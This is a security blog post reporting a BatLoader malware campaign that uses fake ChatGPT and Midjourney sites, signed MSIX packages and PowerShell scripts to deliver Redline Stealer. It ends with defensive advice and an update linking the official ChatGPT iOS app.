Fake ChatGPT and Midjourney Sites used in Cyber-Attacks *** Updated ***

It was only a matter of time before something like this happened. As services like ChatGPT, Midjourney, Bard and other “AI” platform we viral, threat actors were bound to start trying to get in on the action. ChatGPT and Midjourney were easy targets for this as neither has a standalone app yet. To use them you have to get to their online presence; ChatGPT’s website or Midjourney’s Discord. This gap allowed the threat group known as BatLoader to start impersonating both of them via cleverly crafted Google search ads.

The new campaign was discovered by eSentire’s Threat Response Unit who published their findings on Tuesday May 16th, 2023. Once a target has been lured to the fake ChatGPT Web page the page then gets the user to download what is presented as a plugin/app for the popular AI. The download link is to an MSIX package which is signed by a valid code signing certificate making it harder to identify as malicious. The MSIX package then executes both an executable and a PowerShell script as part of the attack chain. The script downloads Redline Stealer and checks in with the C2 server to track new infections. The exe seems to be nothing more than a distraction at this stage as when it has completed the install it produced a popup of the legitimate ChatGPT page inside of a window.

For Midjourney the attack chain is similar, but the PowerShell Script is Base64 obfuscated. It operates the same as the one for ChatGPT in all other aspects.

The signing of the MSIX packages is noteworthy as it shows a level of sophistication. BatLoader knows that unsigned packages are not going to be installed on their currently targeted operating systems (Windows) so they have ensured they can get around that particular hurdle. The execution of a PowerShell script in the background is a fairly common method for silent installation of malware and other malicious tools. This can be prevented with the right Windows security setting such preventing script execution as a spawned process and blocking/alerting on obfuscated scripts. These steps can be relatively simple for a business, but in the consumer world these are not things that are currently easy to get done and are not part of most popular antimalware solutions at the consumer level. This leaves a lot of people open to this attack as the popularity of AI services grows. For now, it is important to stress that neither ChatGPT nor Midjourney have published apps. Any site that claims they do it lying to you.

Update 05-18-2023
Apple and OpenAI have officially announced a ChatGPT app for IOS. Below are the legitimate links for these apps. There is still no App for Windows for ChatGPT, or Midjounrey.
https://apps.apple.com/app/openai-chatgpt/id6448311069
https://openai.com/blog/introducing-the-chatgpt-app-for-ios

 

No comments

Leave your comment

In reply to Some User